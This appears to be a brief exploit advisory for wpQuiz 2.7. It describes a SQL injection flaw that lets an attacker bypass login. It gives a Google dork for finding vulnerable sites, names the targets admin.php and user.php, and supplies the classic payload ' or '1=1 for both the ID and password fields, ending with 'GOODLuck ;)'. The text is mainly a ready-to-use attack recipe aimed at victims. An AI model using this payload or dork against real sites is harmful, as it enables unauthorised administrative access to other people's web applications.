wpQuiz version 2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
85020cf3d0c88fd61910a8a4186652a6f78783e70b8465b29810d12f7e22b90b
Powered by wpQuiz - Auth bypass Vulnerability
~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[+] Greatz : DaiMon
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : wpQuiz
~Version : 2.7
~Download : http://webscripts.softpedia.com/script/Quizz/wpQuiz-41098.html
~Vulnerability Style : Auth bypass
~Google Dork : "Powered by wpQuiz" inurl:index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~ Explotation ~~~~~~~~~~~
http://[Victim]/path/admin.php
[or user.php]
for bypass() bySQL
ID : ' or '1=1
PW : ' or '1=1
GOODLuck ;)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~